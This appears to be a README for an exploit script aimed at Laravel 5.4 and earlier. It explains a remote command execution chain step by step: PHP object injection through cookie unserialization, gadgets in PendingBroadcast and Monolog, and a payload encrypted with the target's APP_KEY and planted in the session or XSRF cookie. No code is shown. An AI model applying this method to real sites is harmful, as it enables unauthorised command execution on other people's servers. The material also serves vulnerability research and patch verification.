Simple script to exploit Remote Command Execution (RCE) on Laravel <= 5.4. To use this script, you must find out the APP_KEY of target.
- The cookie decryption process calls unserialize() function which can be used to PHP Object Injection.
- PHP Object Injection can lead to Remote Command Execution, since there are vulnerable code in Laravel PendingBroadcast.php and Monolog
- Generate PHP Object Injection serialized data and encrypt it using APP_KEY and then set laravel_session or XSRF-TOKEN to encrypted payload. (Some sites change laravel_session to others name)
- Refresh the page and the command is executed.
To make it automatically, the exploit.py is created.
Author : Ravi Dharmawan (ravdhr@gmail.com)